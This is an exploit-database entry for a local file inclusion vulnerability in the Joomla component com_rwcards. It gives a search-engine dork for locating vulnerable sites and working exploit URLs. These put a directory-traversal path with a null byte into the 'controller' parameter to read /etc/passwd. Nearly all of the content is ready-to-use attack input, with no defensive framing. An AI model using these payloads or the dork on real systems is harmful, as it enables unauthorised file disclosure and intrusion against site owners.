id: 9629
date: 03/16/2010
title: Joomla Component com_rwcards - Local File Inclusion Vulnerability
author: altbta
cves: 

=================================================================
Joomla Component com_rwcards - Local File Inclusion Vulnerability
=================================================================

>>>>> Script : Joomla Component com_rwcards
>>>>> Bug Type : Local File Inclusion [LFI]
>>>>> Dork : inurl:"com_rwcards"
 
####################################################################
 
===[ Exploit ]===
 
http://site/index.php?option=com_rwcards&view=rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../etc/passwd%00
 
and
 
http://site/index.php?option=com_rwcards&controller=[LFI]
http://site/index.php?option=com_rwcards&controller=../../../../../../../../../../etc/passwd%00
 
####################################################################



#  0day.today [2023-03-27]  #